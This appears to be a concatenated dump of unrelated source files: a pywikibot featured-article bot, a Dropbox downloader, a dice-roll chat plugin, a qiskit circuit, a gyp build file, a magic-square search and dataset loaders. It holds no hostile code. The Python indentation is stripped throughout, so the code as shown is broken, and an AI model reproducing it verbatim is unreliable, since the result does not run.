for article in cat.articles(endsort=hide):
yield article
if hide:
for article in cat.articles(startsort=unichr(ord(hide) + 1)):
yield article
# not implemented yet
def TMPL(site, name, hide): # pylint: disable=unused-argument
return
# ALL wikis use 'Link FA', and sometimes other localized templates.
# We use _default AND the localized ones
template = {
'_default': ['Link FA'],
'als': ['LinkFA'],
'an': ['Destacato', 'Destacau'],
'ar': ['وصلة مقالة مختارة'],
'ast': ['Enllaz AD'],
'az': ['Link FM'],
'br': ['Liamm PuB', 'Lien AdQ'],
'ca': ['Enllaç AD', 'Destacat'],
'cy': ['Cyswllt erthygl ddethol', 'Dolen ED'],
'eo': ['LigoElstara'],
'en': ['Link FA', 'FA link'],
'es': ['Destacado'],
'eu': ['NA lotura'],
'fr': ['Lien AdQ'],
'fur': ['Leam VdC'],
'ga': ['Nasc AR'],
'gl': ['Ligazón AD', 'Destacado'],
'hi': ['Link FA', 'Lien AdQ'],
'is': ['Tengill ÚG'],
'it': ['Link V', 'Link AdQ'],
'no': ['Link UA'],
'oc': ['Ligam AdQ', 'Lien AdQ'],
'ro': ['Legătură AC', 'Legătură AF'],
'sv': ['UA', 'Link UA'],
'tr': ['Link SM'],
'vi': ['Liên kết chọn lọc'],
'vo': ['Yüm YG'],
'yi': ['רא'],
}
template_good = {
'_default': ['Link GA'],
'ar': ['وصلة مقالة جيدة'],
'ca': ['Enllaç AB', 'Lien BA', 'Abo'],
'da': ['Link GA', 'Link AA'],
'eo': ['LigoLeginda'],
'es': ['Bueno'],
'fr': ['Lien BA'],
'gl': ['Ligazón AB'],
'is': ['Tengill GG'],
'it': ['Link VdQ'],
'nn': ['Link AA'],
'no': ['Link AA'],
'pt': ['Bom interwiki'],
# 'tr': ['Link GA', 'Link KM'],
'vi': ['Liên kết bài chất lượng tốt'],
'wo': ['Lien BA'],
}
template_lists = {
'_default': ['Link FL'],
'no': ['Link GL'],
}
featured_name = {
'wikidata': (DATA, 'Q4387444'),
}
good_name = {
'wikidata': (DATA, 'Q7045856'),
}
lists_name = {
'wikidata': (TMPL, 'Q5857568'),
'ar': (BACK, 'قائمة مختارة'),
'da': (BACK, 'FremragendeListe'),
'de': (BACK, 'Informativ'),
'en': (BACK, 'Featured list'),
'fa': (BACK, 'فهرست برگزیده'),
'id': (BACK, 'Featured list'),
'ja': (BACK, 'Featured List'),
'ksh': (CAT, 'Joode Leß'),
'no': (BACK, 'God liste'),
'pl': (BACK, 'Medalista'),
'pt': (BACK, 'Anexo destacado'),
'ro': (BACK, 'Listă de calitate'),
'ru': (BACK, 'Избранный список или портал'),
'tr': (BACK, 'Seçkin liste'),
'uk': (BACK, 'Вибраний список'),
'vi': (BACK, 'Sao danh sách chọn lọc'),
'zh': (BACK, '特色列表'),
}
# Third parameter is the sort key indicating articles to hide from the given
# list
former_name = {
'wikidata': (DATA, 'Q7045853', {'en': '#'})
}
class FeaturedBot(pywikibot.Bot):
"""Featured article bot."""
# Bot configuration.
# Only the keys of the dict can be passed as init options
# The values are the default values
def __init__(self, **kwargs):
"""Only accepts options defined in availableOptions."""
self.availableOptions.update({
'async': False, # True for asynchronously putting a page
'afterpage': '!',
'count': False, # featuredcount
'featured': False,
'former': False,
'fromall': False,
'fromlang': None,
'good': False,
'lists': False,
'nocache': [],
'side': False, # not template_on_top
'quiet': False,
'interactive': False,
})
super(FeaturedBot, self).__init__(**kwargs)
self.cache = {}
self.filename = None
self.site = pywikibot.Site()
self.repo = self.site.data_repository()
# if no source site is given, give up
if self.getOption('fromlang') is True:
self.options['fromlang'] = False
# setup tasks running
self.tasks = []
for task in ('featured', 'good', 'lists', 'former'):
if self.getOption(task):
self.tasks.append(task)
if not self.tasks:
self.tasks = ['featured']
def itersites(self, task):
"""Generator for site codes to be processed."""
def _generator():
if task == 'good':
item_no = good_name['wikidata'][1]
elif task == 'featured':
item_no = featured_name['wikidata'][1]
elif task == 'former':
item_no = former_name['wikidata'][1]
dp = pywikibot.ItemPage(self.repo, item_no)
dp.get()
for key in sorted(dp.sitelinks.keys()):
try:
site = self.site.fromDBName(key)
except pywikibot.SiteDefinitionError:
pywikibot.output('"%s" is not a valid site. Skipping...'
% key)
else:
if site.family == self.site.family:
yield site
generator = _generator()
if self.getOption('fromall'):
return generator
elif self.getOption('fromlang'):
fromlang = self.getOption('fromlang')
if len(fromlang) == 1 and fromlang[0].find('--') >= 0:
start, end = fromlang[0].split('--', 1)
if not start:
start = ''
if not end:
end = 'zzzzzzz'
return (site for site in generator
if site.code >= start and site.code <= end)
else:
return (site for site in generator if site.code in fromlang)
else:
pywikibot.warning('No sites given to verify %s articles.\n'
                              'Please use -fromlang: or -fromall option\n'
% task)
return ()
def hastemplate(self, task):
add_tl, remove_tl = self.getTemplateList(self.site.code, task)
for i, tl in enumerate(add_tl):
tp = pywikibot.Page(self.site, tl, ns=10)
if tp.exists():
return True
else:
pywikibot.output(tl + ' does not exist')
# The first item is the default template to be added.
# It must exist. Otherwise the script must not run.
if i == 0:
return
else:
return
def readcache(self, task):
if self.getOption('count') or self.getOption('nocache') is True:
return
self.filename = pywikibot.config.datafilepath('cache', task)
try:
f = open(self.filename, 'rb')
self.cache = pickle.load(f)
f.close()
pywikibot.output('Cache file %s found with %d items.'
% (self.filename, len(self.cache)))
except IOError:
pywikibot.output('Cache file %s not found.' % self.filename)
def writecache(self):
if self.getOption('count'):
return
if not self.getOption('nocache') is True:
pywikibot.output('Writing %d items to cache file %s.'
% (len(self.cache), self.filename))
with open(self.filename, 'wb') as f:
pickle.dump(self.cache, f, protocol=config.pickle_protocol)
self.cache = {}
def run(self):
for task in self.tasks:
self.run_task(task)
pywikibot.output('%d pages written.' % self._save_counter)
def run_task(self, task):
if not self.hastemplate(task):
pywikibot.output('\nNOTE: %s articles are not implemented at %s.'
% (task, self.site))
return
self.readcache(task)
for site in self.itersites(task):
try:
self.treat(site, task)
except KeyboardInterrupt:
pywikibot.output('\nQuitting %s treat...' % task)
break
self.writecache()
def treat(self, fromsite, task):
if fromsite != self.site:
self.featuredWithInterwiki(fromsite, task)
def featuredArticles(self, site, task, cache):
articles = []
info = globals()[task + '_name']
if task == 'lists':
code = site.code
else:
code = 'wikidata'
try:
method = info[code][0]
except KeyError:
pywikibot.error(
"language %s doesn't has %s category source."
% (code, task))
return
name = info[code][1]
# hide #-sorted items on en-wiki
try:
hide = info[code][2]
except IndexError:
hide = None
for p in method(site, name, hide):
if p.namespace() == 0: # Article
articles.append(p)
# Article talk (like in English)
elif p.namespace() == 1 and site.code != 'el':
articles.append(pywikibot.Page(p.site,
p.title(with_ns=False)))
pywikibot.output(color_format(
'{lightred}** {0} has {1} {2} articles{default}',
site, len(articles), task))
while articles:
p = articles.pop(0)
if p.title() < self.getOption('afterpage'):
continue
if '/' in p.title() and p.namespace() != 0:
pywikibot.output('%s is a subpage' % p.title())
continue
if p.title() in cache:
pywikibot.output('(cached) %s -> %s' % (
p.title(), cache[p.title()]))
continue
yield p
def findTranslated(self, page, oursite=None):
quiet = self.getOption('quiet')
if not oursite:
oursite = self.site
if page.isRedirectPage():
page = page.getRedirectTarget()
ourpage = None
for link in page.iterlanglinks():
if link.site == oursite:
ourpage = pywikibot.Page(link)
break
if not ourpage:
if not quiet:
pywikibot.output('%s -> no corresponding page in %s'
% (page.title(), oursite))
elif ourpage.section():
pywikibot.output('%s -> our page is a section link: %s'
% (page.title(), ourpage.title()))
elif not ourpage.exists():
pywikibot.output("%s -> our page doesn't exist: %s"
% (page.title(), ourpage.title()))
else:
if ourpage.isRedirectPage():
ourpage = ourpage.getRedirectTarget()
pywikibot.output('%s -> corresponding page is %s'
% (page.title(), ourpage.title()))
if ourpage.namespace() != 0:
pywikibot.output('%s -> not in the main namespace, skipping'
% page.title())
elif ourpage.isRedirectPage():
pywikibot.output(
'%s -> double redirect, skipping' % page.title())
elif not ourpage.exists():
pywikibot.output("%s -> page doesn't exist, skipping"
% ourpage.title())
else:
backpage = None
for link in ourpage.iterlanglinks():
if link.site == page.site:
backpage = pywikibot.Page(link)
break
if not backpage:
pywikibot.output(
'%s -> no back interwiki ref' % page.title())
elif backpage == page:
# everything is ok
yield ourpage
elif backpage.isRedirectPage():
backpage = backpage.getRedirectTarget()
if backpage == page:
# everything is ok
yield ourpage
else:
pywikibot.output(
'%s -> back interwiki ref target is redirect to %s'
% (page.title(), backpage.title()))
else:
pywikibot.output('%s -> back interwiki ref target is %s'
% (page.title(), backpage.title()))
def getTemplateList(self, code, task):
add_templates = []
remove_templates = []
if task == 'featured':
try:
add_templates = template[code]
add_templates += template['_default']
except KeyError:
add_templates = template['_default']
try:
remove_templates = template_good[code]
remove_templates += template_good['_default']
except KeyError:
remove_templates = template_good['_default']
elif task == 'good':
try:
add_templates = template_good[code]
add_templates += template_good['_default']
except KeyError:
add_templates = template_good['_default']
try:
remove_templates = template[code]
remove_templates += template['_default']
except KeyError:
remove_templates = template['_default']
elif task == 'lists':
try:
add_templates = template_lists[code]
add_templates += template_lists['_default']
except KeyError:
add_templates = template_lists['_default']
else: # task == 'former'
try:
remove_templates = template[code]
remove_templates += template['_default']
except KeyError:
remove_templates = template['_default']
return add_templates, remove_templates
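    # Worked example (added note): with the template tables defined above,
    # getTemplateList('es', 'featured') returns
    # (['Destacado', 'Link FA'], ['Bueno', 'Link GA']), i.e. the localized
    # template plus the '_default' fallback to add, and the corresponding
    # "good article" templates to remove.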
def featuredWithInterwiki(self, fromsite, task):
"""Read featured articles and find the corresponding pages.
Find corresponding pages on other sites, place the template and
remember the page in the cache dict.
"""
tosite = self.site
if fromsite.code not in self.cache:
self.cache[fromsite.code] = {}
if tosite.code not in self.cache[fromsite.code]:
self.cache[fromsite.code][tosite.code] = {}
cc = self.cache[fromsite.code][tosite.code]
if self.getOption('nocache') is True or \
fromsite.code in self.getOption('nocache'):
cc = {}
gen = self.featuredArticles(fromsite, task, cc)
if self.getOption('count'):
next(gen, None)
return # count only, we are ready here
gen = PreloadingGenerator(gen)
for source in gen:
if source.isRedirectPage():
source = source.getRedirectTarget()
if not source.exists():
pywikibot.output("source page doesn't exist: %s"
% source)
continue
for dest in self.findTranslated(source, tosite):
self.add_template(source, dest, task, fromsite)
cc[source.title()] = dest.title()
def add_template(self, source, dest, task, fromsite):
"""Place or remove the Link_GA/FA template on/from a page."""
def compile_link(site, templates):
"""Compile one link template list."""
findtemplate = '(%s)' % '|'.join(templates)
return re.compile(r'\{\{%s\|%s\}\}'
% (findtemplate.replace(' ', '[ _]'),
site.code), re.IGNORECASE)
tosite = dest.site
add_tl, remove_tl = self.getTemplateList(tosite.code, task)
re_link_add = compile_link(fromsite, add_tl)
re_link_remove = compile_link(fromsite, remove_tl)
text = dest.text
m1 = add_tl and re_link_add.search(text)
m2 = remove_tl and re_link_remove.search(text)
changed = False
interactive = self.getOption('interactive')
if add_tl:
if m1:
pywikibot.output('(already added)')
else:
# insert just before interwiki
if (not interactive
or pywikibot.input_yn(
'Connecting %s -> %s. Proceed?'
% (source.title(), dest.title()),
default=False, automatic_quit=False)):
if self.getOption('side'):
# Placing {{Link FA|xx}} right next to
# corresponding interwiki
text = (text[:m1.end()]
+ ' {{%s|%s}}' % (add_tl[0], fromsite.code)
+ text[m1.end():])
else:
# Moving {{Link FA|xx}} to top of interwikis
iw = textlib.getLanguageLinks(text, tosite)
text = textlib.removeLanguageLinks(text, tosite)
text += '%s{{%s|%s}}%s' % (
config.LS, add_tl[0], fromsite.code, config.LS)
text = textlib.replaceLanguageLinks(text,
iw, tosite)
changed = True
if remove_tl:
if m2:
if (changed # Don't force the user to say "Y" twice
or not interactive
or pywikibot.input_yn(
'Connecting %s -> %s. Proceed?'
% (source.title(), dest.title()),
default=False, automatic_quit=False)):
text = re.sub(re_link_remove, '', text)
changed = True
elif task == 'former':
pywikibot.output('(already removed)')
if changed:
comment = i18n.twtranslate(tosite, 'featured-' + task,
{'page': source})
try:
dest.put(text, comment)
self._save_counter += 1
except pywikibot.LockedPage:
pywikibot.output('Page %s is locked!'
% dest.title())
except pywikibot.PageNotSaved:
pywikibot.output('Page not saved')
def main(*args):
"""
Process command line arguments and invoke bot.
If args is an empty list, sys.argv is used.
@param args: command line arguments
@type args: unicode
"""
options = {}
local_args = pywikibot.handle_args(args)
issue_deprecation_warning(
'featured.py script', 'Wikibase Client extension',
0, UserWarning, since='20160307')
for arg in local_args:
if arg.startswith('-fromlang:'):
options[arg[1:9]] = arg[10:].split(',')
elif arg.startswith('-after:'):
options['afterpage'] = arg[7:]
elif arg.startswith('-nocache:'):
options[arg[1:8]] = arg[9:].split(',')
else:
options[arg[1:].lower()] = True
bot = FeaturedBot(**options)
bot.run()
if __name__ == '__main__':
main()
|
py | 1a4fa9bd986224e4cdc1e3c7b03a72966898fb0d | # -*- coding: utf-8 -*-
import urllib3
from dropbox import client, rest
import os
class DropboxDownloader:
def __init__(self, token_path):
self.api_client = None
urllib3.disable_warnings()
self.__oauth2(token_path)
def __oauth2(self, token_path):
with open(token_path) as f:
serialized_token = f.read()
if serialized_token.startswith('oauth2:'):
access_token = serialized_token[len('oauth2:'):]
self.api_client = client.DropboxClient(access_token)
else:
print('token error')
def do_ls(self):
resp = self.api_client.metadata('')
file_list = []
if 'contents' in resp:
for f in resp['contents']:
name = os.path.basename(f['path'])
file_list.append(name)
return file_list
def do_get(self, from_path, to_path):
to_file = open(to_path, "wb")
f, metadata = self.api_client.get_file_and_metadata(from_path)
#print 'Metadata:', metadata
to_file.write(f.read())
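# ---------------------------------------------------------------------------
# Hedged usage sketch (added; not part of the original module). It assumes a
# token file containing "oauth2:<access token>" and uses the legacy Dropbox
# v1 client API imported above; the file paths are purely illustrative.
#
#   downloader = DropboxDownloader('dropbox_token.txt')
#   print(downloader.do_ls())                  # names in the app root folder
#   downloader.do_get('/report.pdf', 'report.pdf')
# ---------------------------------------------------------------------------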
|
py | 1a4faa7d421204e2ce111e641334fd3bb45edd15 | import re
from nonebot import on_message, on_command
from nonebot.adapters import Bot, Event
from nonebot.log import logger
from nonebot.adapters.cqhttp.permission import GROUP
from nonebot.adapters.cqhttp.message import Message
from nonebot.rule import regex
from .common import START, SEP, CONF
from .roll import roll
RE_ROLL_STR = (
"^(" # 1
+ START
+ CONF.i7s_roll_command
+ " |"
+ CONF.i7s_roll_trigger
# 2 3 4 5 6
+ r" )([0-9adgimnsuvx+\- ]+)( ?(结果)?(大于|小于|大于等于|小于等于|>=|>|<|<=) ?(-?\d{1,10}))?"
)
RE_ROLL_CMD = re.compile(RE_ROLL_STR)
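# Worked example (added note), assuming the configured command word resolves
# to "roll": for a message like "roll 3d6+1d3-1 大于 10", RE_ROLL_CMD captures
# the dice expression in group(2), the comparison operator ("大于") in
# group(5) and the target value ("10") in group(6); these are exactly the
# three values that roll_command_handler below passes on to roll().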
async def roll_command_handler(bot: Bot, event: Event, state: dict):
messages = []
logger.info(f"[7sRoll] received roll command: {event.raw_message}")
if await GROUP(bot, event):
messages.append(f"[CQ:at,qq={event.user_id}]")
match = None
if "_match" in state:
match = state["_matched"]
else:
args = str(event.raw_message).strip()
match = RE_ROLL_CMD.match(args)
if not match:
messages.append("roll 命令格式错误")
messages.append("格式为:roll <表达式>[ <判断方式><目标>]")
messages.append("表达式举例:3d6+1d3-1")
messages.append("判断方式可选:>, <, <=, >=, 或对应中文")
messages.append("目标:需要达成的点数")
return await cmd_roll.finish(Message("\n".join(messages)))
if match.group(1) is None:
return
expr_str, op_str, target = match.group(2, 5, 6)
messages.extend(roll(expr_str, op_str, target))
return await cmd_roll.finish(Message("\n".join(messages)))
cmd_roll = on_command(CONF.i7s_roll_command, priority=1, block=True)
cmd_roll.handle()(roll_command_handler)
message_cmd_roll = on_message(rule=regex(RE_ROLL_STR), priority=2, block=True)
message_cmd_roll.handle()(roll_command_handler)
|
py | 1a4fab0e7767447b5196c9527791d0dd9d948dd9 | # qubit number=4
# total number=40
import cirq
import qiskit
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2
import numpy as np
import networkx as nx
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[3]) # number=23
prog.rx(-0.6848671984825748,input_qubit[1]) # number=26
prog.cz(input_qubit[0],input_qubit[3]) # number=24
prog.h(input_qubit[3]) # number=25
prog.cx(input_qubit[0],input_qubit[3]) # number=17
prog.h(input_qubit[3]) # number=37
prog.cz(input_qubit[0],input_qubit[3]) # number=38
prog.h(input_qubit[3]) # number=39
prog.x(input_qubit[3]) # number=31
prog.cx(input_qubit[0],input_qubit[3]) # number=32
prog.h(input_qubit[3]) # number=33
prog.cz(input_qubit[0],input_qubit[3]) # number=34
prog.h(input_qubit[3]) # number=35
prog.cx(input_qubit[0],input_qubit[3]) # number=15
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=3
prog.h(input_qubit[3]) # number=4
prog.y(input_qubit[3]) # number=12
prog.h(input_qubit[0]) # number=5
oracle = build_oracle(n-1, f)
prog.append(oracle.to_gate(),[input_qubit[i] for i in range(n-1)]+[input_qubit[n-1]])
prog.h(input_qubit[1]) # number=6
prog.h(input_qubit[2]) # number=7
prog.cx(input_qubit[3],input_qubit[0]) # number=20
prog.z(input_qubit[3]) # number=21
prog.h(input_qubit[0]) # number=27
prog.cz(input_qubit[3],input_qubit[0]) # number=28
prog.h(input_qubit[0]) # number=29
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[0]) # number=9
prog.y(input_qubit[2]) # number=10
prog.h(input_qubit[1]) # number=36
prog.y(input_qubit[2]) # number=11
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
a = "111"
b = "0"
f = lambda rep: bitwise_xor(bitwise_dot(a, rep), b)
prog = make_circuit(4,f)
backend = BasicAer.get_backend('qasm_simulator')
sample_shot =8000
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit2535.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.__len__(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
|
gyp | 1a4fadc7a4efee80a216bbaef21ccd0efeb33244 | ##
# Portions Copyright (c) Microsoft Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS CODE IS PROVIDED *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION
# ANY IMPLIED WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR
# PURPOSE, MERCHANTABLITY OR NON-INFRINGEMENT.
#
# See the Apache Version 2.0 License for specific language governing
# permissions and limitations under the License.
##
{
'targets': [
{
'target_name': 'edge',
'win_delay_load_hook': 'false',
'include_dirs' : [
"<!(node -e \"require('nan')\")"
],
'sources': [
],
'conditions': [
['OS=="win"'
, {
'sources+': [
'src/dotnet/edge.cpp',
'src/dotnet/utils.cpp',
'src/dotnet/clrfunc.cpp',
'src/dotnet/clrfuncinvokecontext.cpp',
'src/dotnet/nodejsfunc.cpp',
'src/dotnet/nodejsfuncinvokecontext.cpp',
'src/dotnet/persistentdisposecontext.cpp',
'src/dotnet/clrfuncreflectionwrap.cpp',
'src/common/v8synchronizationcontext.cpp',
'src/dotnet/clractioncontext.cpp'
]
}
]
],
'configurations': {
'Release': {
'msvs_settings': {
'VCCLCompilerTool': {
# this is out of range and will generate a warning and skip adding RuntimeLibrary property:
'RuntimeLibrary': -1,
# this is out of range and will generate a warning and skip adding RuntimeTypeInfo property:
'RuntimeTypeInfo': -1,
'BasicRuntimeChecks': -1,
'ExceptionHandling': '0',
'AdditionalOptions': [ '/clr', '/wd4506' ]
},
'VCLinkerTool': {
'AdditionalOptions': [ '/ignore:4248' ]
}
}
},
'Debug': {
'msvs_settings': {
'VCCLCompilerTool': {
# this is out of range and will generate a warning and skip adding RuntimeLibrary property:
'RuntimeLibrary': -1,
# this is out of range and will generate a warning and skip adding RuntimeTypeInfo property:
'RuntimeTypeInfo': -1,
'BasicRuntimeChecks': -1,
'ExceptionHandling': '0',
'AdditionalOptions': [ '/clr', '/wd4506' ]
},
'VCLinkerTool': {
'AdditionalOptions': [ '/ignore:4248' ]
}
}
}
}
}
]
}
|
py | 1a4fae15797330311ed5561a351e9c3b10356d57 | import FWCore.ParameterSet.Config as cms
ptMinPFJets = cms.EDFilter(
"PtMinPFJetSelector",
src = cms.InputTag(''),
ptMin = cms.double(0)
)
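# Hedged usage sketch (added; not part of the original fragment). In a CMSSW
# configuration this selector is normally cloned with a concrete input
# collection and threshold; the label and values below are illustrative only.
#
#   goodPFJets = ptMinPFJets.clone(
#       src = 'ak4PFJetsCHS',
#       ptMin = 30.0
#   )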
|
py | 1a4fae81ff667594c0678131596b4afe1116afb6 | #coding:latin-1
class CarreMagique :
def __init__(self, coef) :
self.mat = [ [ coef[i+j*3] for i in range(3) ] for j in range(3) ]
def __str__(self) :
return "\n".join ( [ ",".join( [ str(n) for n in row ] ) for row in self.mat ] )
def __add__ (self, carre) :
coef = []
for i in range(3) :
for j in range(3) :
coef.append ( self.mat[i][j] + carre.mat[i][j])
return CarreMagique(coef)
def somme_ligne_colonne_diagonale(self):
tout = [ sum ( ligne ) for ligne in self.mat ] + \
[ sum ( [ self.mat[i][j] for j in range(3) ] ) for i in range(3) ] + \
[ sum ( [ self.mat[i][i] for i in range(3) ] ) ] + \
[ sum ( [ self.mat[2-i][i] for i in range(3) ] ) ]
return tout
def coefficient_unique(self):
d = { }
for ligne in self.mat :
for c in ligne :
d [c] = d.get(c,0) + 1
return len(d) == 9
def est_magique(self):
unique = self.coefficient_unique()
if not unique : return False
somme = self.somme_ligne_colonne_diagonale()
return min(somme) == max(somme)
def tous_les_carres_permutation_ligne12_meme_somme( permut = None, pos = 0):
if pos == 9 :
carre = CarreMagique (permut)
if carre.est_magique() :
#print (carre)
#print ()
return [ carre ]
else :
return []
else :
        if pos >= 6 :  # added: early pruning
            if sum ( permut[:3]) != sum(permut[3:6]) :  # added: rows 1 and 2 must share the same sum
                return [ ]  # added
res = [ ]
if permut == None :
permut = [ i+1 for i in range(9) ]
for i in range (pos,9) :
            # swap elements i and pos
a = permut[i]
permut[i] = permut[pos]
permut[pos] = a
            res += tous_les_carres_permutation_ligne12_meme_somme(permut, pos+1) # changed
            # undo the swap (restore the original order)
a = permut[i]
permut[i] = permut[pos]
permut[pos] = a
return res
import time
d = time.perf_counter()
res = tous_les_carres_permutation_ligne12_meme_somme()
d = time.perf_counter() - d
print ("nombre de carr�s", len(res), " en ", d)
|
py | 1a4fae9e68d190438a4173e20ad1df0de1a0a312 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
sys.path.append('./')
import codecs
import collections
import torch
import pickle
import utils
import torch.nn as nn
class Loader():
def __init__(self, target_dir):
self.target_dir = target_dir
self.char2idx = collections.defaultdict(int)
self.label2idx = {'O': 0, 'I': 1, 'B': 2}
def load(self,
data_file,
make_word_dict):
with codecs.open(data_file, 'r', 'utf-8') as r:
lines = r.readlines()
# Converting format
data_features, data_labels = read_corpus(lines)
if make_word_dict:
self.char2idx = make_dic(self.char2idx, doc_sent=data_features)
unk_char_id = len(self.char2idx) - 1
unk_label_id = len(self.label2idx) - 1
sents_idx = [[[self.char2idx.get(char, unk_char_id) for char in word] \
for word in sent] \
for sent in data_features]
'''
        Sample of the data when the training data is the "toy" corpus
'''
'''
defaultdict(<class 'int'>, {'e': 0, 'a': 1, 'i': 2, 't': 3, 's': 4, 'n': 5,
'r': 6, 'o': 7, 'h': 8, 'd': 9, 'l': 10, 'c': 11, 'u': 12, 'm': 13, 'p': 14,
'g': 15, 'f': 16, 'y': 17, 'w': 18, '.': 19, 'S': 20, 'T': 21, 'b': 22, 'E': 23,
'I': 24, 'A': 25, 'v': 26, ',': 27, 'N': 28, '1': 29, 'P': 30, 'k': 31, 'R': 32,
'L': 33, '-': 34, '0': 35, '9': 36, 'O': 37, '2': 38, 'B': 39, 'G': 40, 'C': 41,
'M': 42, 'D': 43, 'U': 44, 'F': 45, '6': 46, 'K': 47, "'": 48, '"': 49, '5': 50,
'H': 51, 'q': 52, 'W': 53, 'J': 54, '4': 55, '7': 56, '3': 57, '8': 58, 'x': 59,
'Y': 60, 'V': 61, 'j': 62, '(': 63, ')': 64, '$': 65, '/': 66, '=': 67, 'z': 68,
'+': 69, 'X': 70, 'Q': 71, '&': 72, 'Z': 73, ':': 74, '<unk>': 75})
'''
#print(data_features)
'''
[['EU', 'rejects', 'German', 'call', 'to', 'boycott', 'British', 'lamb', '.'],
['Peter', 'Blackburn'], ...
'''
#print(sents_idx)
'''
[[[23, 44], [6, 0, 62, 0, 11, 3, 4], [40, 0, 6, 13, 1, 5], [11, 1, 10, 10],
[3, 7], [22, 7, 17, 11, 7, 3, 3], [39, 6, 2, 3, 2, 4, 8], [10, 1, 13, 22], [19]],
[[30, 0, 3, 0, 6], [39, 10, 1, 11, 31, 22, 12, 6, 5]], ...
'''
labels_idx = [[self.label2idx.get(label, unk_label_id) for label in labels] \
for labels in data_labels]
#print(labels_idx)
'''
[[1, 0, 1, 0, 0, 0, 1, 0, 0],
[1, 1], ...
'''
pickle.dump([self.char2idx, self.label2idx, sents_idx, labels_idx],
open(self.target_dir + "CoNLL_char_" + data_file[19:] + ".pkl", "wb"))
def read_corpus(lines):
"""
convert corpus into features and labels
"""
features = list()
labels = list()
tmp_fl = list()
tmp_ll = list()
for line in lines:
if not (line.isspace() or (len(line) > 10 and line[0:10] == '-DOCSTART-')):
line = line.rstrip('\n').split()
tmp_fl.append(line[0])
tmp_ll.append(line[-1][0])
elif len(tmp_fl) > 0:
features.append(tmp_fl)
labels.append(tmp_ll)
tmp_fl = list()
tmp_ll = list()
if len(tmp_fl) > 0:
features.append(tmp_fl)
labels.append(tmp_ll)
return features, labels
def make_dic(char2idx, doc_sent):
    # sort characters by frequency and assign ids
words = utils.flatten(doc_sent)
chars = utils.flatten(words)
counter = collections.Counter()
counter.update(chars)
cnt = 0
for char, count in counter.most_common():
        # add only characters that appear at least once to the dictionary
if count >= 1:
char2idx[char] = cnt
cnt += 1
char2idx[u'<unk>'] = len(char2idx)
return char2idx
def main():
torch.manual_seed(1)
TARGET_DIR = '../corpus/data/'
GLOVE_FILE = '../corpus/glove.6B/glove.6B.50d.txt'
#TRAIN_FILE = TARGET_DIR + 'eng.train' # 14041 sentences
#TEST_FILE = TARGET_DIR + 'eng.test'
TRAIN_FILE = TARGET_DIR + 'toy.train' # 143 sentences
TEST_FILE = TARGET_DIR + 'toy.test'
#TRAIN_FILE = TARGET_DIR + 'mid.train' # 3153 sentences
#TEST_FILE = TARGET_DIR + 'mid.test'
EMBEDDING_DIM = 50
loader = Loader(target_dir=TARGET_DIR)
    # when loading the training data, build the character dictionary
loader.load(data_file=TRAIN_FILE,
make_word_dict=True)
    # when loading the test data, do not rebuild the dictionary
loader.load(data_file=TEST_FILE,
make_word_dict=None)
if __name__ == '__main__':
main()
|
py | 1a4faebf6fe3269c375f2f316d22294746dc7e95 | # -*- coding:UTF-8 -*-
import numpy as np
from numpy import array
from PIL import Image
from multiprocessing import Pool
import os, sys, argparse, time, cv2, shutil, random
# python python/shoes/get_data_by_edge.py -i data/shoes/img3 -b data/shoes/background -o data/shoes
img_dir = 'JPEGImages'
lbs_dir = 'labels'
def get_file_list(input_dir, backgr_dir, output_root):
if not os.path.exists(output_root):
os.mkdir(output_root)
backgr_img_set = []
for temp_img in os.listdir(backgr_dir):
if temp_img.endswith('.jpg'):
backgr_img = os.path.join(backgr_dir, temp_img)
backgr_img_set.append(backgr_img)
input_img_list = []
output_img_list = []
output_txt_list = []
for temp_img in os.listdir(input_dir):
if temp_img.endswith('.jpg'):
input_img = os.path.join(input_dir, temp_img)
temp_name = temp_img[:temp_img.rfind('.')]
output_img = os.path.join(output_root, img_dir, temp_name+'-add.jpg')
output_txt = os.path.join(output_root, lbs_dir, temp_name+'-add.txt')
input_img_list.append(input_img)
output_img_list.append(output_img)
output_txt_list.append(output_txt)
output_num = len(output_img_list)
backgr_num = len(backgr_img_set)
times = output_num/backgr_num + 1
backgr_img_list = random.sample(times*backgr_img_set, output_num)
return input_img_list, backgr_img_list, output_img_list, output_txt_list
